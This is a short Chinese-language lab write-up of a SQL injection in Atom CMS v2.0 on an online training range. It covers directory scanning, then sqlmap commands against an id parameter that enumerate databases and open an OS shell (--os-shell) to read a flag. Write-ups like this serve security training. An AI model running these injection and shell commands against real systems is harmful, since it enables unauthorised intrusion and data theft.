简介

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。
实际上这个靶场漏洞很多,有很多注入点。

本人使用春秋云境免费靶场在线搭建。

详解

  1. 直接访问网址,跳转/home路径,而且报错。

2023-06-11T09:31:33.png

  1. 使用dirsearch工具扫描路径,发现有个/admin/uploads.php路径。访问路径。

2023-06-11T09:33:56.png

  1. 页面返回mysql报错信息,而且有个where id=,尝试参数id=1访问。

2023-06-11T09:36:21.png

  1. id传过去了,而且没有mysql报错信息。尝试使用sqlmap注入。
  2. 使用SQLmap注入,id存在注入点。是报错注入和时间盲注。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 

2023-06-11T09:39:31.png

  1. 查看所有数据库,发现没有flag数据库(一般flag都会存在flag数据库中)。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --dbs
  1. flag应该是在根目录下flag文件中,使用sqlmap获取shell。成功获取flag。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --os-shell

2023-06-11T09:44:40.png